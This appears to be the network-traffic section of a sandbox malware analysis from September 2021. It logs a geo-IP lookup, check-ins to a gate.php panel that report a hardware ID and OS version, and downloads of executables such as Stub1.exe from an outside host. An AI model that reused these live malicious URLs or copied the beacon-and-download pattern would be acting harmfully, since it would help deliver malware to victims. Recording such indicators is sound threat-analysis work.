Network Analysis

GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 19 Sep 2021 02:28:52 GMT Content-Type: application/json; charset=utf-8 Content-Length: 348 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: no-cache Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F1FNqP5C19Bkf3Lso657OcNh8Biae5PSEqEOnrzOXliFXQJI8C2ODDbUKJEEsXGC1CzvxEnW3emdqPzoj4xp1YeSuFk4aImpAlmR%2BwrxJofSPl4Y2usRzX8GOg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 690f6210ce480a6a-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET //cisCheckerstroke.php HTTP/1.1 Host: sh1729062.b.had.su Connection: Keep-Alive

GET //gate.php?hwid=7C6024AD&os=6.1.7601&av= HTTP/1.1 Host: sh1729062.b.had.su

GET //loader.txt HTTP/1.1 Host: sh1729062.b.had.su

GET /123123.exe HTTP/1.1 Host: sherence.ru Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 19 Sep 2021 02:29:18 GMT Content-Type: application/x-msdos-program Content-Length: 208896 Connection: keep-alive last-modified: Sat, 18 Sep 2021 23:24:58 GMT etag: "33000-5cc4d5b39b6d2" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=72iOauT0BFCne9D3hUCf7WiG1l4pYQ%2B2C9FafJypo6fLt%2Bhafa%2FdXPVj9MWf5i5XauqVBQ54jOVquP6CBl%2BE3RMGJfeHWIcWbpjJdvPxjrRWYM3sL%2FoRIGY7DaBQKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 690f62a7bea10aa6-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /Stub1.exe HTTP/1.1 Host: sherence.ru

HTTP/1.1 200 OK Date: Sun, 19 Sep 2021 02:29:19 GMT Content-Type: application/x-msdos-program Content-Length: 484352 Connection: keep-alive last-modified: Sat, 18 Sep 2021 13:56:58 GMT etag: "76400-5cc456be52150" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aEe%2Be%2BKede8g7Xtdz%2FGTa4ZqaBjGW3REAE%2Bv59TY8s0HB9XWAX39h46EVxsYDA951A8eXOFADwiFxYKoarAdhtIBxwKE4Sti2kB80mTOX0AdDe2Sn%2Fcv9zLSzpr%2BoA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 690f62b82b1e0aa6-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /323.exe HTTP/1.1 Host: sherence.ru Connection: Keep-Alive

HTTP/1.1 404 Not Found Date: Sun, 19 Sep 2021 02:30:39 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o5Ocewd2Jn7frkvnQQrG0j9uQmPl0x0E9wQXbhXmQrnrZWbR7TjsqNgRwFrBp6bnD0RgWYAasAme53ZTIzR55AwWi651mgb0dFKHFLbRTJu0bA8KsHRPUMLHAuKXLw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 690f64ad09e80a5a-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400